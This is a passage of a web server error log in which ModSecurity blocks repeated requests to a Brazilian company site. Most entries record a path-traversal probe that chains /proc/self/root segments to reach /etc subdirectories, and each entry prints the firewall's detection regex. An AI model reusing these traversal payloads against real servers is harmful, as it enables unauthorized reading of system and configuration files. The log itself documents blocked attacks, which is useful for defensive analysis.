[unique_id "abhA9aTCbgAP5jq5Teg2wAAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:19.515116 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:35570] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA-7ysWC90G-1nBrBOgQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:29.627399 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.241.46:60730] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBBaQpVkWug9HeOt9AqwAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:32.085089 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:52552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBCKQpVkWug9HeOt9ArgAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:42.373565 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:52562] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBEnjZBu2q05ozVU9kawAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:42:59.416018 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:38178] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBI3jZBu2q05ozVU9kfQAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:43:21.919199 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.241.46:53162] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBOZqj1wV0Si-Okef54gAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:43:26.604284 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:49336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBPrysWC90G-1nBrBOkwAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:43:29.014049 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:49350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBQaTCbgAP5jq5Teg2_AAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:44:08.771191 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:44294] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBaNSswJuvopo3lOhpbAAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:44:10.185394 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:40694] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBaqTCbgAP5jq5Teg3CAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:45:21.862673 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:40708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBsaTCbgAP5jq5Teg3UwAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:45:34.657616 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:59974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBvrysWC90G-1nBrBOuAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:45:35.971845 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:34916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBv46lpbStxTqkSkt2ugAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:45:39.847901 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:34924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBw6QpVkWug9HeOt9A2wAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:45:41.554882 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.241.46:53878] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhBxaQpVkWug9HeOt9A3QAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:46:53.157120 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:53892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhCDbysWC90G-1nBrBO_wAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:47:09.907486 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.228.16:37304] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhCHXjZBu2q05ozVU9lPQAAAUo"]
[Mon Mar 16 14:47:23.810407 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:39090] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhCK_9ocpUE4ed4uDz6ZwAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:47:31.352491 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:51646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhCM6TCbgAP5jq5Teg3fwAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:49:18.091094 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:42176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhCnf9ocpUE4ed4uDz6zAAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:49:29.264280 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.244.31:48140] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhCqKTCbgAP5jq5Teg3kQAAAs8"]
[Mon Mar 16 14:49:29.278861 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:58202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhCp7ABkC4fWIHEf8H6uAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:49:31.851104 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:56692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 